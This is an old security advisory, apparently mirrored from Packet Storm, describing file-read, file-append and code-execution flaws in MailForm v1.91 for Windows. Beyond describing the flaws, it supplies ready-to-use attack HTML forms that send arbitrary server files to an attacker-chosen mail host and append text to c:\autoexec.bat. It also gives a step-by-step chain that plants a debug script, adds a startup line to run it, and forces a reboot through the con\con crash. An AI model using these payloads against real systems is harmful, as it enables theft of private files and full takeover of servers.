Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormChopsui-cidePACKETSTORM:17520
HistoryApr 07, 2000 - 12:00 a.m.

mailform.txt

2000-04-0700:00:00
Chopsui-cide
packetstormsecurity.com
20
JSON
`Advisory: MailForm v1.91 for Windows 95 and NT 4.0  
Chopsui-cide[MmM]  
The Mad Midget Mafia - http://midgets.box.sk/  
=======================================================================  
Do not save this with any editor, or _vital_ formatting may be lost.  
  
Disclaimer:  
=============  
This document is intended as an advisory, and I cannot be held  
accountable for its misuse. The reader assumes all responsibility for  
his/her use of this information.  
  
Summary:  
==========  
Date released: 07/04/2000 (dd/mm/yyyy).  
Risk: denial of service, reading of private files, appending to  
private files, full system compromise if the afforementioned risks  
are leveraged properly.  
Vulnerability found by: Chopsui-cide  
Vulnerable: MailForm v1.91, probably prior versions (not tested).  
Immune: ?  
  
MailForm allows potentially dangerous parameters to be specified by  
anyone who can execute it. These allow for reading and writing of  
files on the system on which MailForm resides.  
  
Details:  
==========  
Problem fields:  
_1_TextLog -  
_1_HTMLLog - these two are the ones used to write to files.  
_1_MailTemplate - this is what is used to retrieve files.  
_1_INIFile - possibly dangerous, but not discussed here.  
_1_MailServer - we can just change this to our own address.  
_1_MailTo - we don't even need to bother with this.  
  
It's fairly obvious where the problem lies here. We can specify any  
file to send + the POP server to send it to. The con\con bug may also  
be used to bring down the entire system. Template files will be cut  
off at the first null character, so retrieving of binaries is not  
practical. Trying to retrieve certain files will cause MailForm to  
crash.  
  
A very crude example of how to run code on the remote system is  
provided in the last section of this advisory.  
  
Implementation: web interface  
===============================  
I have constructed some html that allows an attacker to download and  
append to files on any remote system running MailForm (cut where it  
says [snip], obviously):  
  
[snip]  
<html>  
<title>Web interface for MailForm vulnerabilities.</title>  
</head>  
Do not be alarmed by any "Form submission failed" errors. These are  
normal. You will need to modify the form tags in this page to  
correspond to the host being attacked.<br>  
<br>  
Download file:<br>  
<body bgcolor="#FFFFFF">  
  
<form method="POST" action="http://localhost/cgi-bin/mailform.exe">  
<input type="text" name="_1_MailServer" value="yourhost"><br>  
<input type="text" name="_1_MailTemplate" value="..\xitami.aut"><br>  
<input type="hidden" size="30" name="_1_MailTo" value="[email protected]">  
<input type="hidden" size="40" name="Name" value="me">  
<input type="submit" value="Send" name="_2_Submit">  
</form>  
<br>  
Append to file:<br>  
Note: your text will be preceeded by garbage.<br>  
<body bgcolor="#FFFFFF">  
<form method="POST" action="http://localhost/cgi-bin/mailform.exe">  
<input type="hidden" name="_1_MailServer" value="x">  
<input type="hidden" name="_1_MailTemplate" value="nul">  
<input type="text" name="_1_TextLog" size="40" value="c:\autoexec.bat"><br>  
<input type="hidden" size="30" name="_1_MailTo" value="[email protected]">  
<textarea name="Name" rows="4" cols="40"></textarea>  
<br><input type="submit" value="Send" name="_2_Submit">  
</form>  
<a href="http://midgets.box.sk">The Mad Midget Mafia</a><br>  
</body>  
</html>  
[snip]  
  
The e-mail will be sent to the host you specify on port 25. It should  
be easy enough to capture using netcat.  
  
Implementation: full compromise  
=================================  
When appending text to files, the following kind of ugly crap  
preceeds it:  
[snip]  
Submitted at Thu Apr 06 22:14:49 2000 from 192.168.1.1  
  
Name:  
[snip]  
Even with this handicap, we can still modify/create batch files.  
This is how we will execute code.  
  
The idea here is to create a kind of "script" for debug that will  
assemble and execute a small program. It is basically just a list of  
keystrokes. We then add an entry to autoexec.bat that executes it.  
Fist we need to upload the following file to c:\windows\script.txt  
[snip]  
  
a 100  
mov dx,10b  
mov ah,09  
int 21  
mov ah,4c  
int 21  
db "Code has been executed.",0d,0a,"$"  
  
g=100  
q  
[snip]  
  
Make sure at the end of each line there is _no_ carriage return. Each  
line should be terminated by \x0a (linefeed). Get rid of the carriage  
returns (\x0d), ie:  
a 100  
mov dx,10b  
mov ah,09  
int 21  
mov ah,4c  
int 21  
db "Code has been executed.",0d,0a,"$"  
  
g=100  
q  
  
  
Add a newline (\x0d,\x0a) before the above, and submit the two lines  
using the web-based interface.  
  
Add the following line to any batch file that is executed upon start-up  
(ie, autoexec.bat):  
debug < c:\windows\script.txt  
  
Check that everything is in order by trying to download both script.txt  
and the batch file you modified.  
  
Force a reboot using the con\con vulnerability. Once it restarts, the  
code will be executed. I know this is a really ugly hack, but it works  
(poor excuse). Also, make sure the garbage doesn't interfere with  
anything (always put a newline before the start of your commands).  
  
=======================================================================  
  
`
JSON